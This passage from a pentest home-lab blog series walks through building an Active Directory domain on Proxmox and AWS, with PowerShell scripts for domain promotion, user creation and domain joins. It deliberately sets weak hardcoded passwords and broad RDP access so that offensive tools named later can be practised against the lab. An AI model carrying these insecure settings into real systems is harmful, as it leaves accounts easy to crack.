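$Domain   = 'lab.local'
$NetBios  = 'LAB'

# Step 5: static IP. Every domain member will point its DNS at this address,
# so it must never change. Disable DHCP on the adapter, drop whatever address
# and default route DHCP handed out, then set the static one.
Set-NetIPInterface -InterfaceAlias $Iface -Dhcp Disabled
Get-NetIPAddress -InterfaceAlias $Iface -AddressFamily IPv4 -ErrorAction SilentlyContinue |
    Remove-NetIPAddress -Confirm:$false
Remove-NetRoute -InterfaceAlias $Iface -DestinationPrefix '0.0.0.0/0' -Confirm:$false -ErrorAction SilentlyContinue
New-NetIPAddress -InterfaceAlias $Iface -IPAddress $DcIp -PrefixLength 24 -DefaultGateway $Gateway
# The DC resolves through its own DNS server once promoted, so point it at itself now.
Set-DnsClientServerAddress -InterfaceAlias $Iface -ServerAddresses $DcIp

# Step 6: hostname. A rename needs a reboot before promotion, so on the first
# run the script stops here; run it again after the box comes back.
if ($env:COMPUTERNAME -ne $Hostname) {
    Rename-Computer -NewName $Hostname -Force -Restart
    return
}

# Promotion steps 2-10: the AD DS and DNS Server roles with their management tools.
Install-WindowsFeature -Name AD-Domain-Services, DNS -IncludeManagementTools

# Promotion steps 12-17: new forest. The DSRM password (step 16) is the local
# Administrator password for Directory Services Restore Mode; record it.
$Dsrm = ConvertTo-SecureString 'LabDSRM-P@ssw0rd!' -AsPlainText -Force   # assumed lab value
Import-Module ADDSDeployment
Install-ADDSForest `
    -DomainName $Domain `
    -DomainNetbiosName $NetBios `
    -ForestMode Win2012R2 `
    -DomainMode Win2012R2 `
    -InstallDns `
    -SafeModeAdministratorPassword $Dsrm `
    -Force
# The server reboots on its own (step 18). After it is back, confirm with:
#   Get-ADDomain | Select-Object DNSRoot, NetBIOSName, DomainMode
#   Get-ADDomainController | Select-Object HostName, IPv4Address
```

<div>
Run it twice: the first pass sets the IP, renames the host and reboots; the second pass adds the roles and builds the forest, and the server reboots again by itself. With -InstallDns the promotion configures the DNS Server role and creates the zone, which is why the DC's own DNS client can already point at its static address.</div>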
<h3>
You now have an Active Directory Domain - Add some users</h3>
<div>
I'm going to walk you through adding a bunch of users, and how to make one of those users a domain administrator. I am not going to cover setting up OU's in this post. If you are interested doing that now, take a look at this awesome post from Jared Haight: <a href="https://www.psattack.com/articles/20160718/setting-up-an-active-directory-lab-part-3/">Setting up an Active Directory Lab - Part 3</a></div>
<div>
<ul>
<li>Within Server Manager, which should have just popped up, click <b>Tools</b> at the top right and select <b>Active Directory Users and Computers</b></li>
<li>Double click on your domain to expand it</li>
<li>Right click on users and add new user</li>
<li>Name your users however you want, but I like to keep it simple: </li>
<ul>
<li>First: <b>User</b></li>
<li>Last: <b>1</b></li>
<li>Login name: <b>user1</b></li>
<li>Next</li>
<li>Enter an easy to remember/crack password</li>
<li>Uncheck <b>user must change at next login</b></li>
<li>Check <b>password never expires</b></li>
<li>Next</li>
<li>Finish</li>
</ul>
<li>Repeat for user2</li>
<li>Then I suggest adding some user accounts that you will use as admins. You can go with <i>user1-admin</i>, or even just a simple <i>admin1, admin2</i></li>
</ul>
<h3>
Add at least one admin user to your domain admins group</h3>
</div>
<div>
<ul>
<li>Within <b>Active Directory Users and Computers</b>, Double click <b>Domain Admins</b></li>
<li>Click <b>Members</b></li>
<li>Click <b>Add</b></li>
<li>Start typing a username of your admin user and click <b>check names</b></li>
<li>Click <b>OK</b></li>
<li>Click <b>OK</b></li>
</ul>
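<div>
<br /></div>
<div>
Here is the same procedure as a PowerShell script (an added example, not from the original post), covering both the user-creation steps and the Domain Admins step above. It assumes the ActiveDirectory module on the DC, and the account names and passwords are constructed lab values; change them to match your lab.</div>

```powershell
# Added example (not from the original post): creates the lab users and admins
# from the steps above and adds the admins to Domain Admins, using the
# ActiveDirectory module that the AD DS role installs. Run in an elevated
# PowerShell on the DC. Account names and passwords are constructed lab values.
Import-Module ActiveDirectory

$upnSuffix = (Get-ADDomain).DNSRoot            # e.g. lab.local

# Deliberately weak lab passwords, as the post suggests, so the cracking tools
# covered later have something to find. Never reuse them outside the lab.
$accounts = @(
    @{ Sam = 'user1';  Given = 'User';  Surname = '1'; Password = 'Password1';   Admin = $false },
    @{ Sam = 'user2';  Given = 'User';  Surname = '2'; Password = 'Summer2017';  Admin = $false },
    @{ Sam = 'admin1'; Given = 'Admin'; Surname = '1'; Password = 'Password123'; Admin = $true  },
    @{ Sam = 'admin2'; Given = 'Admin'; Surname = '2'; Password = 'Winter2017';  Admin = $true  }
)

foreach ($a in $accounts) {
    # Idempotent: re-running the script must not error on accounts that exist.
    if (Get-ADUser -Filter "SamAccountName -eq '$($a.Sam)'") {
        Write-Host "$($a.Sam) already exists, skipping"
        continue
    }
    $params = @{
        Name                  = "$($a.Given) $($a.Surname)"
        GivenName             = $a.Given
        Surname               = $a.Surname
        SamAccountName        = $a.Sam
        UserPrincipalName     = "$($a.Sam)@$upnSuffix"
        AccountPassword       = (ConvertTo-SecureString $a.Password -AsPlainText -Force)
        ChangePasswordAtLogon = $false   # "User must change password at next logon" unchecked
        PasswordNeverExpires  = $true    # "Password never expires" checked
        Enabled               = $true
    }
    New-ADUser @params
    Write-Host "Created $($a.Sam)"
}

# Add the admin accounts to Domain Admins (the steps under the heading just above).
$admins = $accounts | Where-Object { $_.Admin } | ForEach-Object { $_.Sam }
Add-ADGroupMember -Identity 'Domain Admins' -Members $admins

# Verify: Domain Admins should now list Administrator plus your lab admins.
Get-ADGroupMember -Identity 'Domain Admins' | Select-Object -ExpandProperty SamAccountName
```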
<h2>
VM #3: Creating your second 2012r2 server</h2>
This VM is optional, but the beauty of using a hypervisor on dedicated hardware is that you most likely have memory and storage space to spare. <br />
<br />
<div>
1) Repeat steps 1 and 2 on VM2, but this time name it something like SRV01:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-zhsqiCAoRWQ/WS-hWsJmrRI/AAAAAAAABbM/Fdr0_cidDooEli_CZFLKZtQS_Mbjz-J2ACEw/s1600/29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="247" data-original-width="596" height="165" src="https://3.bp.blogspot.com/-zhsqiCAoRWQ/WS-hWsJmrRI/AAAAAAAABbM/Fdr0_cidDooEli_CZFLKZtQS_Mbjz-J2ACEw/s400/29.png" width="400" /></a></div>
<br />
2) Start the server and add it to the domain<br />
<br />
<h3>
Configuring DNS</h3>
To add any machine to the domain, the one thing you NEED to do is set the domain controller as the primary DNS server. <br />
<br />
1) RDP to server<br />
2) Right click on the networking icon at the bottom left and click Open Network and Sharing Center<br />
3) Select Ethernet Adapter<br />
4) Change the primary DNS server to be the IP address of your DC<br />
<br />
<h3>
Adding host to the domain</h3>
While this process is fairly straightforward, I feel like it never works the first time for me. If you run into issues, read the notes right after these steps for ideas.<br />
<br />
1) Select the folder icon in the task bar<br />
2) Right click This PC<br />
3) Click Properties<br />
4) Under Computer name, domain, and workgroup settings, click Change settings<br />
5) Click Change<br />
6) Give your machine a better hostname: Workstation01 <br />
7) Switch from Workgroup to Domain and specify the domain. For example, aws.local<br />
8) Click OK<br />
9) Enter Domain Admin credentials. Go ahead and use Admin1's credentials.<br />
10) Once your machine has been added, click OK twice<br />
11) Close the window, and go ahead and Restart Now<br />
12) Repeat this for all servers<br />
<br />
Having trouble adding your host to the domain? Here are some troubleshooting tips:<br />
<br />
1) Can you ping the IP address of your DC from your other server(s)?<br />
2) Can you resolve the hostname of your DC from your other server(s)?<br />
3) Can you navigate to \\IP_ADDRESS_OF_DC from your other server(s)?<br />
<br />
Here are things to look for:<br />
<br />
<ul>
<li>Network config settings:</li>
<ul>
<li>Did you give your DC the right subnet mask when you configured the static IP?</li>
<li>Did you configure the primary DNS server properly on your non-DC host?</li>
</ul>
<li>Are you typing in the right domain name when attempting to add your host?</li>
</ul>
<br />
<h3>
Adding domain users to the remote desktop group</h3>
<div>
You might not ever even need to RDP to your hosts because the proxmox console is pretty good. I still like to do this anyway though. </div>
<div>
<div>
1) Select the folder icon in the task bar</div>
<div>
2) Right click <b>This PC</b></div>
<div>
3) Click <b>Properties</b></div>
<div>
4) On the left, click <b>Remote Settings</b>, and enter the domain administrator credentials</div>
<div>
5) In the <b>Remote Desktop</b> section of the window, click <b>Select Users...</b></div>
<div>
6) Click <b>Add...</b></div>
<div>
7) Type <b>Domain Users</b> and click <b>Check Names</b></div>
<div>
8) Click <b>OK, OK, OK</b></div>
<div>
<br /></div>
<div>
You should now be able to RDP to this host with any of your domain users (User1, User2, Admin1)</div>
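<div>
<br /></div>
<div>
The member-host steps above (DNS to the DC, the troubleshooting checks, the domain join, and the Remote Desktop group) as two PowerShell functions; this is an added example, not from the original post. The DC address 192.168.1.10, domain lab.local, hostname WORKSTATION01 and the admin1 account are constructed values to change for your lab.</div>

```powershell
# Added example (not from the original post): run Join-LabDomain in an elevated
# PowerShell on the host being joined, then Enable-LabRdp after the reboot.
# Constructed values: DC at 192.168.1.10, domain lab.local (NetBIOS LAB),
# hostname WORKSTATION01, and admin1 from the DC setup as the joining Domain Admin.

function Join-LabDomain {
    param(
        [string]$DcIp       = '192.168.1.10',
        [string]$DomainName = 'lab.local',
        [string]$NewName    = 'WORKSTATION01',
        [string]$AdminUser  = 'admin1'
    )
    # 1) Make the DC the primary DNS server on the active adapter. Without this the
    #    join cannot locate the domain, which is the failure the post warns about.
    $adapter = Get-NetAdapter | Where-Object { $_.Status -eq 'Up' } | Select-Object -First 1
    Set-DnsClientServerAddress -InterfaceIndex $adapter.ifIndex -ServerAddresses $DcIp
    Clear-DnsClientCache

    # 2) The post's troubleshooting questions, automated: ping, name resolution,
    #    and the ports a join needs (Kerberos, LDAP, SMB). A FAIL usually means a
    #    wrong subnet mask on the DC, wrong DNS here, or a firewall rule in the way.
    $checks = [ordered]@{
        "ICMP to $DcIp"       = Test-Connection -ComputerName $DcIp -Count 1 -Quiet
        "Resolve $DomainName" = [bool](Resolve-DnsName -Name $DomainName -Server $DcIp -ErrorAction SilentlyContinue)
        'Kerberos 88/tcp'     = Test-NetConnection -ComputerName $DcIp -Port 88  -InformationLevel Quiet
        'LDAP 389/tcp'        = Test-NetConnection -ComputerName $DcIp -Port 389 -InformationLevel Quiet
        'SMB 445/tcp'         = Test-NetConnection -ComputerName $DcIp -Port 445 -InformationLevel Quiet
    }
    foreach ($c in $checks.GetEnumerator()) {
        '{0,-22} {1}' -f $c.Key, $(if ($c.Value) { 'OK' } else { 'FAIL' })
    }
    if ($checks.Values -contains $false) {
        throw 'Fix the failing checks before joining (see the troubleshooting tips above).'
    }

    # 3) Rename and join in one step. The password is prompted for rather than
    #    written into the script, so it stays out of the file and your history.
    $cred = Get-Credential -UserName "$DomainName\$AdminUser" -Message 'Domain Admin credentials'
    Add-Computer -DomainName $DomainName -NewName $NewName -Credential $cred -Force
    Restart-Computer -Force
}

function Enable-LabRdp {
    param([string]$DomainNetbios = 'LAB')
    # 4) After the reboot: let every domain user RDP to this host, as in the
    #    "Remote Desktop" steps above. Lab convenience only; on a real server you
    #    would name a much smaller group than Domain Users.
    $member = "$DomainNetbios\Domain Users"
    if (Get-Command Add-LocalGroupMember -ErrorAction SilentlyContinue) {
        Add-LocalGroupMember -Group 'Remote Desktop Users' -Member $member   # PowerShell 5.1+
        Get-LocalGroupMember -Group 'Remote Desktop Users'
    } else {
        net localgroup 'Remote Desktop Users' $member /add                     # 2012 R2 fallback
        net localgroup 'Remote Desktop Users'
    }
}
```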
<h2>
</h2>
<h2>
VM #4: Creating our Windows 10 Template</h2>
<div>
Everything you need to configure a Windows 10 VM and add it to the domain is shown above in one way or another. Here is the high-level approach: </div>
<div>
<br /></div>
<div>
1) Create the Windows10 VM</div>
<div>
2) Install Windows10 using the ISO we downloaded earlier</div>
<div>
3) Configure the OS with any custom configurations or software before turning it into a template</div>
<div>
4) Turn this VM (VM #4) into a template</div>
<div>
<br /></div>
<div>
<h2>
VM #5 & #6: Creating two Windows 10 VMs from the template</h2>
</div>
<div>
<div>
1) Clone the template to be one Windows10 VM at minimum, but feel free to use 2 or 3 VMs</div>
<div>
2) Configure DNS to point to domain controller</div>
<div>
3) Configure host name</div>
<div>
4) Add VM to the domain<br />
5) Enable file and printer sharing<br />
6) Add domain users to the Remote Desktop group</div>
</div>
<br />
<h2>
Wrap Up</h2>
</div>
<div>
You did it! You should now have 1 DC, and 1-3 additional hosts set up in ProxmoxVE. You are now ready to try all sorts of stuff, like CrackMapExec, Empire, Metasploit, Mimikatz, Kerberoasting, and more. My next posts will walk through running these tools against your active directory pentest lab.<br />
<br />
Are there any specific tools or techniques related to Active Directory penetration testing you would like me to cover? If so, leave a comment! If I know how to do it, I'll cover it. If I don't, I'll try to learn it and then I'll cover it!</div>
</div>
Seth Art (http://www.blogger.com/profile/05253599496757968918), 2017-05-04, updated 2017-12-02<br />
<br />
<h2>
Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</h2>
In <a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building a virtual corporate domain</a>, we talked about why you would want to build your own AD pentest lab, where you can build it (cloud vs on-premises options), and the pros and cons of each option.<br />
<br />
This post covers building your lab on AWS. Even if you have a lab at home, setting up a small second home lab on AWS is a worthwhile exercise. You'll learn a lot about AWS in the process. <br />
<br />
<h2>
The series so far:</h2>
<div>
<ul>
<li><a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building A Virtual Corporate Domain</a></li>
<li><a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html" target="">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a> (This post)</li>
<li><a href="https://sethsec.blogspot.com/2017/06/pentest-home-lab-0x2-building-your-ad.html" target="">Pentest Home Lab - 0x2 - Building Your AD Lab on Premises using Proxmox VE</a></li>
<li><a href="https://sethsec.blogspot.com/2017/08/pentest-home-lab-0x3-kerberoasting.html">Pentest Home Lab - 0x3 - Kerberoasting: Creating SPNs so you can roast them</a></li>
</ul>
</div>
<br />
<h2>
Table of Contents</h2>
<ul>
<li>What are we going to build?</li>
<li>Creating your AWS instances</li>
<ul>
<li>Instance #1: This will be the Domain Controller</li>
<li>Instance #2: This will be Workstation01 </li>
<ul>
<li>Disable IE Enhanced Security Configuration</li>
</ul>
<li>Instances #3 & #4 (Optional)</li>
<li>Create security groups so that your LAN hosts can talk to each other</li>
</ul>
<li>Creating the Domain</li>
<ul>
<li>Setting up WindowsServer2016-1 to be a Domain Controller</li>
<ul>
<li>Configure a static IP (Required)</li>
<li>Change the hostname (Optional)</li>
<li>Promote the server to a Domain Controller</li>
</ul>
<li>You now have an Active Directory Domain - Add some users</li>
<li>Add at least one admin user to your domain admins group</li>
<li>The Homestretch - Add all hosts to the domain</li>
<ul>
<li>Configure DNS</li>
<li>Add hosts to the domain</li>
<li>Add domain users to the remote desktop group</li>
</ul>
</ul>
</ul>
<br />
<h3>
What are we going to build?</h3>
<div>
At the end of this post, <b>you will have a fully functional AD environment in AWS</b> that you can use to make yourself a better penetration tester. I'm not going to assume you are familiar with AWS or setting up Active Directory, so some of this might be review. </div>
<div>
<br /></div>
<div>
You will configure 2-4 AWS EC2 instances:</div>
<div>
<br /></div>
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-rUbKMM6cDnA/WQegsdrQ7mI/AAAAAAAABSY/a3cVHmvhxlg6ALQFFWQTYoEWEfxuA4bTgCEw/s1600/instances2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://2.bp.blogspot.com/-rUbKMM6cDnA/WQegsdrQ7mI/AAAAAAAABSY/a3cVHmvhxlg6ALQFFWQTYoEWEfxuA4bTgCEw/s400/instances2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You will create a Windows 2016 domain, promote one server to be a DC, and add additional hosts to the domain:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-ih6RMV26IVM/WQf7LNoFXqI/AAAAAAAABUo/wvy4jseyvUUbsaDxviW_UYLezodwQAfQQCEw/s1600/computers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://3.bp.blogspot.com/-ih6RMV26IVM/WQf7LNoFXqI/AAAAAAAABUo/wvy4jseyvUUbsaDxviW_UYLezodwQAfQQCEw/s400/computers.png" width="400" /></a></div>
<br />
You will create at least 2 users and 1 administrator account:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-WtHfWzT6u0I/WQf7LNIYQSI/AAAAAAAABUo/IHxF8-plsRQ56xe8K7YeMEMAg1gVZxgAACEw/s1600/users.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://2.bp.blogspot.com/-WtHfWzT6u0I/WQf7LNIYQSI/AAAAAAAABUo/IHxF8-plsRQ56xe8K7YeMEMAg1gVZxgAACEw/s400/users.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
<div>
To get started, you really only need a Domain Controller and a Workstation. To be able to test out more stuff, you'll probably end up wanting at least two workstations (User 1's workstation and User 2's workstation), and at least one more non-DC server. </div>
<br />
<b>Note:</b> If you missed my last post, I mentioned that AWS does not provide an AMI (AMIs are like images) for Windows 7/8/10. I also mentioned that while not a true replica of what we run into on the job, I have found that you can just treat servers as if they were clients, and it is good enough. In other words, you have everything you need to simulate a compromised victim's workstation for the purposes of our testing with Windows Server 2012/2016. So for our AWS lab, our <i>workstations</i> will just be additional Windows 2016 servers. <br />
<br />
One last thing. To understand/estimate what your AWS lab will cost you, check out the <b>AWS Math</b> section in my last post: <a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building a virtual corporate domain</a>.<br />
<br />
To summarize:<br />
<br />
<ul>
<li><b>EC2</b>: You pay for EC2 instances only for the hours that the instance is running</li>
<li><b>EBS</b>: You pay for EBS volumes from the time they are provisioned to the time they are removed. This means that even if you don't use your lab for the entire month, you will still get charged for the provisioned EBS space. </li>
</ul>
<br />
Some numbers:<br />
<br />
<ul>
<li><b>2 Windows instances, 1 Kali instance, used 30 hours/month on average</b></li>
<ul>
<li>Monthly EC2 Cost: $1.38/month</li>
<li>Monthly EBS Cost: $8/month</li>
<li>Monthly Total: $9.38/month</li>
<li><b>Annual Total: $112</b></li>
</ul>
<li><b>4 Windows instances, 1 Kali instance, used 30 hours/month on average</b></li>
<ul>
<li>Monthly EC2 Cost: $2.36/month</li>
<li>Monthly EBS Cost: $14/month</li>
<li>Monthly Total: $16.36/month</li>
<li><b>Annual Total: $196</b></li>
</ul>
</ul>
<br />
<br />
<h2>
Creating your AWS instances</h2>
<div>
<br /></div>
<h3>
Instance #1: This will be the Domain Controller</h3>
<div class="separator" style="clear: both; text-align: center;">
</div>
1) If you have not already, <a href="https://aws.amazon.com/resources/create-account/">Create an AWS account </a><br />
<div>
<br />
2) Once your account is created, log into the <a href="https://aws.amazon.com/console/">AWS Console</a></div>
<div>
<br />
3) Once you log in, under <b>Compute</b>, click <b>EC2</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-uI5092wkozE/WQAfBTXnysI/AAAAAAAABOc/Pmnvg8qB-OsvVURl78IHazHaAPSM1HkGACEw/s1600/01%2B-%2BCompute%2B-%2BEC2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-uI5092wkozE/WQAfBTXnysI/AAAAAAAABOc/Pmnvg8qB-OsvVURl78IHazHaAPSM1HkGACEw/s1600/01%2B-%2BCompute%2B-%2BEC2.png" /></a></div>
<div>
<br />
<div>
</div>
<div>
4) Under <b>Create Instance</b>, click <b>Launch Instance</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-QQJTh3UCfkU/WQAfBR-JuhI/AAAAAAAABOk/cN5UwabOTqAHGPKcfrdEZ4hxGc5hbuPfQCEw/s1600/02%2B-%2Blaunch%2Binstance.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://4.bp.blogspot.com/-QQJTh3UCfkU/WQAfBR-JuhI/AAAAAAAABOk/cN5UwabOTqAHGPKcfrdEZ4hxGc5hbuPfQCEw/s640/02%2B-%2Blaunch%2Binstance.png" width="640" /></a></div>
<div>
<br />
5) Find <b>Microsoft Windows Server 2016 Base</b> and click <b>Select</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-8AWdUi4-Pc0/WQAfBa2_lYI/AAAAAAAABOg/bAAxX8IXr-gG-BJTi08ioGpTi_2NYWTnACEw/s1600/03%2B-%2Bwindows%2Bserver%2B2016.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="82" src="https://2.bp.blogspot.com/-8AWdUi4-Pc0/WQAfBa2_lYI/AAAAAAAABOg/bAAxX8IXr-gG-BJTi08ioGpTi_2NYWTnACEw/s640/03%2B-%2Bwindows%2Bserver%2B2016.png" width="640" /></a></div>
<div>
<br />
6) Pick <b>t2.micro</b> (or any other size)</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-LrNftBg58Dc/WQAfBpQPP1I/AAAAAAAABOo/6w8PAR1rYSs-cLSoB4Z8xsZdwoKGb9hCgCEw/s1600/04%2B-%2Bsize.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://3.bp.blogspot.com/-LrNftBg58Dc/WQAfBpQPP1I/AAAAAAAABOo/6w8PAR1rYSs-cLSoB4Z8xsZdwoKGb9hCgCEw/s640/04%2B-%2Bsize.png" width="640" /></a></div>
<div>
<br />
7) Click <b>Next: Configure Instance Details</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-61wJS7BbQsY/WQAfBkcbXeI/AAAAAAAABQE/AQqHYA-xmX0kXHFHEb6ntuaivMoOa_TXwCEw/s1600/05%2B-%2BNext%2B-%2Bconfigure%2Binstance%2Bdetails.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="https://1.bp.blogspot.com/-61wJS7BbQsY/WQAfBkcbXeI/AAAAAAAABQE/AQqHYA-xmX0kXHFHEb6ntuaivMoOa_TXwCEw/s640/05%2B-%2BNext%2B-%2Bconfigure%2Binstance%2Bdetails.png" width="640" /></a></div>
<div>
<br /></div>
<div>
8) Accept defaults and click <b>Next: Add Storage</b> (Or if you are more familiar with AWS, feel free to create a new VPC or a new subnet for this lab) </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-ROGNAtatZyw/WQAfB2AW0iI/AAAAAAAABQE/1OXClUT1EYMVES1BU7az3UCZ4MGZLzJIACEw/s1600/06%2B-%2Bnext%2B-%2Badd%2Bstorage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="504" src="https://4.bp.blogspot.com/-ROGNAtatZyw/WQAfB2AW0iI/AAAAAAAABQE/1OXClUT1EYMVES1BU7az3UCZ4MGZLzJIACEw/s640/06%2B-%2Bnext%2B-%2Badd%2Bstorage.png" width="640" /></a></div>
<div>
<br /></div>
<div>
9) Accept defaults and click <b>Next: Add Tags</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-bP58t8kBDAI/WQAfB_f89BI/AAAAAAAABQE/yMkxmyEJ85wCuiQ3umRzF6-N6u3AjtGEQCEw/s1600/07%2B-%2Bnext%2B-%2Badd%2Btags.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="402" src="https://3.bp.blogspot.com/-bP58t8kBDAI/WQAfB_f89BI/AAAAAAAABQE/yMkxmyEJ85wCuiQ3umRzF6-N6u3AjtGEQCEw/s640/07%2B-%2Bnext%2B-%2Badd%2Btags.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
10) Accept defaults and click <b>Next: Configure Security Group</b> </div>
</div>
<div>
<br /></div>
<div>
Time to configure your security group. If you are unfamiliar with security groups but familiar with traditional firewalls, think of it like this: a security group is a set of firewall rules, and you can attach as many security groups as you want to each AWS instance. The combination of attached groups is, in effect, that instance's firewall policy.</div>
<div>
<br /></div>
<div>
For your lab, I suggest you limit RDP access to your public ISP-assigned address (if you are doing this at work, I suggest using a VPN to connect to your lab). The cool thing is that if that address changes, you can just log into the AWS console from anywhere and change the IP in the security group. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-x_BIIuh-LHs/WQAfB7mm5AI/AAAAAAAABQE/tmkLC2GyqwkAbBj5x1e2l2EtDBQ8maNoQCEw/s1600/09%2B-%2Bconfigure%2Bsecurity%2Bgroups.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://3.bp.blogspot.com/-x_BIIuh-LHs/WQAfB7mm5AI/AAAAAAAABQE/tmkLC2GyqwkAbBj5x1e2l2EtDBQ8maNoQCEw/s640/09%2B-%2Bconfigure%2Bsecurity%2Bgroups.png" width="640" /></a></div>
<div>
<br />
11) Click <b>Review</b> and <b>Launch</b>, then <b>Launch</b> </div>
<div>
<br /></div>
<div>
12) If you haven't created an AWS keypair yet, create one. If you have, you know what to do here. </div>
<div>
<br /></div>
<div>
13) <b>Launch Instance</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-iMVlDki3ntk/WQAfCIt7GuI/AAAAAAAABQE/fAczGoZ0KpwzxdsoprGqmlKptgGUkqi-QCEw/s1600/10%2B-%2Bcreate%2Bnew%2Bkeypair.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="https://4.bp.blogspot.com/-iMVlDki3ntk/WQAfCIt7GuI/AAAAAAAABQE/fAczGoZ0KpwzxdsoprGqmlKptgGUkqi-QCEw/s640/10%2B-%2Bcreate%2Bnew%2Bkeypair.png" width="640" /></a></div>
<div>
<br />
14) Let's go see our new instance. Go to <b>Services</b> > <b>EC2</b> </div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-fdGf5rh2Lr8/WQAfCLtcVaI/AAAAAAAABQE/ciNoZnXNkD0LHPs4OsB-KEqkEmJfDJFzgCEw/s1600/11%2B-%2Bback%2Bto%2Bec2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="https://1.bp.blogspot.com/-fdGf5rh2Lr8/WQAfCLtcVaI/AAAAAAAABQE/ciNoZnXNkD0LHPs4OsB-KEqkEmJfDJFzgCEw/s400/11%2B-%2Bback%2Bto%2Bec2.png" width="400" /></a></div>
<div>
<br />
<div>
15) You will now see a new running instance. Click the <b>Running Instances</b> link </div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/--tFgs5JOAbw/WQAfCPWvHXI/AAAAAAAABQE/fkC4FjrpV_MzDZeBScE4SmDmQXToD3avQCEw/s1600/12%2B-%2Brunning%2Binstances.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://3.bp.blogspot.com/--tFgs5JOAbw/WQAfCPWvHXI/AAAAAAAABQE/fkC4FjrpV_MzDZeBScE4SmDmQXToD3avQCEw/s400/12%2B-%2Brunning%2Binstances.png" width="400" /></a></div>
<div>
<br /></div>
<div>
16) Your new instance will say <b>Initializing</b> under <b>Status Checks</b>. It is a good idea to rename it. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-4khNXFSFABs/WQAfCFbqlaI/AAAAAAAABQE/u2Huj-9aazQmRgvB5t7cSAMPgEaUp3GAQCEw/s1600/13%2B-%2Brename%2Binstance.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://1.bp.blogspot.com/-4khNXFSFABs/WQAfCFbqlaI/AAAAAAAABQE/u2Huj-9aazQmRgvB5t7cSAMPgEaUp3GAQCEw/s640/13%2B-%2Brename%2Binstance.png" width="640" /></a></div>
<div>
<br />
17) While it finishes initializing, find the instance's public IP. You can find it to the right under <b>IPv4 public IP</b>, or in the <b>lower frame</b>, in the <b>description tab</b>, under <b>IPv4 Public IP</b>. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-aAuj5qut8Vg/WQAfCVljfWI/AAAAAAAABQE/RTfU6XtdI5c84oLfo_GObIwyEWSzRo-qACEw/s1600/14%2B-%2Binstance%2Bdescription.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="https://2.bp.blogspot.com/-aAuj5qut8Vg/WQAfCVljfWI/AAAAAAAABQE/RTfU6XtdI5c84oLfo_GObIwyEWSzRo-qACEw/s640/14%2B-%2Binstance%2Bdescription.png" width="640" /></a></div>
<div>
<br />
18) Select your instance and click <b>Connect</b> </div>
<div class="separator" style="clear: both; text-align: center;">
